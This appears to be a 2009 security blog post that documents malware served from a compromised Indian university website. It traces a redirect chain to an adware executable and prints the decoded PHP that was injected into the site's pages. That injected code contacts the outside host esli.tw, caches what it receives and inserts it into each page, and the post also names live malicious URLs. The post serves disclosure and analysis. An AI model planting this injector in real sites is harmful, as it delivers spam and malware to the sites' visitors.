Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

Couple of days back I reported the infection to few Security Researchers through OWASP. Now Firefox and Google says the same!! If we visit http://www.nagarjunauniversity.ac.in/, Firefox browser alarms you with the following warning

Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link

Google description about the pages hosted by www.nagarjunauniversity.ac.in is

Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.


Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention about bale.ws domain.
When we open above site it gets redirected to
http://superpupermegacasino.com/which hosts *SmartDownload.exe*

Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script

error_reporting(0);

$links = new GetLinks();

echo $links->Links;
class GetLinks
{
var $host = "esli.tw";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";

var $Links = "";


var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";

function GetLinks()
{
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);
}

fclose($handle);
}
else {
$this->Links = file_get_contents($this->_cashe_file);
}
}

function fetch_remote_file()
{
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {

} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
}
fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!